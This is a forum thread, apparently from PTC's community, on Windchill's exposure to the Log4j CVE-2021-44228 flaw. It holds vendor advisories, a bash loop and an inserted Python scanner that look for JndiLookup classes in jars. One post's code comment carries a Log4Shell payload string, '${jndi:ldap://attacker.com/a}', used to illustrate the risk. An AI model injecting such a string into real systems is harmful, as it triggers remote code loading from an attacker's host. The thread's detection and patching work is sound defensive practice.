Just opening this thread as I haven't seen it anywhere else. Have there been any talks about the log4j exploit and Windchill? We are on Windchill 11 so I would assume we are open to the vulnerability but haven't seen anything mentioning it anywhere on PTC's sites. Just looking to get ahead of this in any way possible.
Figured I would open this thread publicly instead of a support case as it is affecting everyone.
Hi @ErikZabokrtsky .
As @ScottMorris responded, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.
Please refer to this mini-site in order to get the latest updates on this investigation.
In case of any issue or doubt, please contact our Technical Support team.
Thank you.
--JC
Good timing, I was just searching the PTC support site and could not find anything. We are on WC11.1 and the security team is looking for an immediate action. I am going to submit a high priority case to make sure PTC is aware of the issue.
PTC Technical Support Response:
PTC R&D team and Security Team are actively working, as a priority, on the reported Log4j2 vulnerability CVE-2021-44228.
The log4j version used by Windchill can be detected by referring to this article: https://www.ptc.com/en/support/article/CS358667
PTC Security Experts will roll out an official communication soon about this CVE, its impact for customers & the next actions.
Scott
That article suggests that you look at this article: https://www.ptc.com/en/support/article/CS358789 which has some Immediate actions to take. It makes sense to do the Immediate actions .. immediately! Before thinking about how exactly the attacker will be exploiting Log4J.
Just my two cents. cheers -- Rick
@Jean-Christophe wrote:
Hi @ErikZabokrtsky .
As @ScottMorris responded, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.
I hope they are also taking into account custom code like this:
WTPart part;
//part name = "${jndi:ldap://attacker.com/a}"
Logger log = LogR.getLogger(MyCustomClass.class.getName());
log.error("Is this an issue?? part name: " + part.getName());
Thank you for the suggestion, @RandyJones.
Our security team has been extensively testing, but I will pass on your suggestion.
Hi @Jean-Christophe ,
Please could you pass on the question whether Office Workers are vulnerable? We found log4j-core-2.11.1.jar in Adobe Experience Manager (provided by PTC as part of Creo View Office Worker Adapters).
We can't find anything regarding the workers on the PTC support website.
Regards
Rob
Hi @rhart ,
Please be aware that we have created a minisite to act as a more comprehensive hub on this situation.
I will pass on your question to the security team. In parallel, I encourage you to engage our support team for closer assistance on your question.
@Jean-Christophe wrote:
... In parallel, I encourage that you engage our support team for a closer assistance on your question
"Case Logger": https://www.ptc.com/en/support/case-logger
Thank you for raising this question to our support staff. We will publish the outcome of the investigation around Office Workers in the mini site once it is available.
Following is something one can use to find any jar file that contains the JndiLookup class or any class/path that contains the string JndiLookup. Because it is using "grep -i" this is a case insensitive search. This is what we used to find "affected" jar files in our Solr install. This is sh or bash.
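cd /opt/ptc/Windchill/Solr/SolrServer
# List every jar below the current directory; reading the paths line by line
# keeps file names that contain spaces intact.
find . -name '*.jar' -print | while IFS= read -r jar
do
    # Case-insensitive search of the jar's table of contents for JndiLookup
    if jar tvf "$jar" | grep -qi JndiLookup; then
        echo "Issue in $jar"
    fi
done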
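A broader version of the search above, as an added example that is not part of the original post or PTC's tooling: it also looks inside jars nested in WAR/EAR/fat-jar archives, which a listing of the outer archive does not reveal, and reports the log4j-core version when the jar carries its Maven pom.properties. It matches only entries ending in JndiLookup.class (case-insensitively) and needs no JDK `jar` tool; the function names are chosen here for illustration.

```python
import io
import os
import zipfile

ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "jndilookup.class"  # compared in lower case, like grep -i
# Maven metadata that log4j-core jars carry; gives the exact version
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def scan_archive(fileobj, label, findings=None):
    """Return [(archive, entry, log4j_core_version_or_None)], recursing into nested archives."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(fileobj)
    except zipfile.BadZipFile:
        return findings  # truncated or not really an archive: skip it
    with zf:
        names = zf.namelist()
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        for name in names:
            lower = name.lower()
            if lower.endswith(JNDI_CLASS):
                findings.append((label, name, version))
            elif lower.endswith(ARCHIVE_EXTS):
                # Nested archive (e.g. WEB-INF/lib/*.jar): scan it in memory
                scan_archive(io.BytesIO(zf.read(name)), f"{label}!/{name}", findings)
    return findings


def scan_tree(root):
    """Walk a directory tree and scan every archive found below it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    scan_archive(fh, path, findings)
    return findings


if __name__ == "__main__":
    import sys
    for archive, entry, version in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"Issue in {archive}: {entry} (log4j-core {version or 'version unknown'})")
```

Run it with the install directory as the only argument, for example the Solr directory used in the post above.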
Hello @HaithemBouajila
As stated in CS358789, Windchill 11.1 M020 and earlier (including 11.0 M030 and older versions) are using log4j 1.x, so it should not be vulnerable.
* PTC security team continuously monitors and analyzes supported Windchill releases for any reported critical or high CVE.
Please always check the latest CS358789 for updates.
3rd party bundled components may still be vulnerable, please:
Solr: Refer to CS359011, Solr of old Windchill releases (10.1, 10.2, 11.0) is not impacted by CVE-2021-44228.
Cognos: Refer to CS359007 and the IBM update page "An update on the Apache Log4j CVE-2021-44228 vulnerability".
Tibco: Refer to CS359008 and the TIBCO published article "TIBCO Log4j Vulnerability Daily Update".
Thanks,
Susan